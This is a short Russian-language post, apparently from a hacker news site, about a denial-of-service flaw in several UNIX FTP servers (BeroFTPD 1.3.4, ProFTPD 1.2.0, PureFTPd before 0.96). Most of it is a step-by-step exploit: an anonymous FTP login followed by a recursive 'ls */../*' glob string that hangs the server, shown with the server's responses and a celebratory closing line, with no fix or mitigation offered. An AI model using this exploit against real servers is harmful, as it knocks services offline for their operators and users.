Многие UNIX-овые FTP
сервера имеют ошибку, с помощью которой
легко можно вызвать DoS атаку. Уязвимые
системы:

BeroFTPD версии 1.3.4
Proftpd 1.2.0
PureFTPd (версии до 0.96)
Вероятно также многие другие.

Пример эксплоита

Коннектимся через ftp к
серваку

$ ftp ftp.example.org

Name (ftp.example.org:): ftp

230 Anonymous access granted, restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.

Посылаем строчку

ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
227 Entering Passive Mode (216,10,40,219,4,111).

Все, система подвешена

421 Service not available, remote server
timed out. Connection closed

Уря товарищи!



Оставить мнение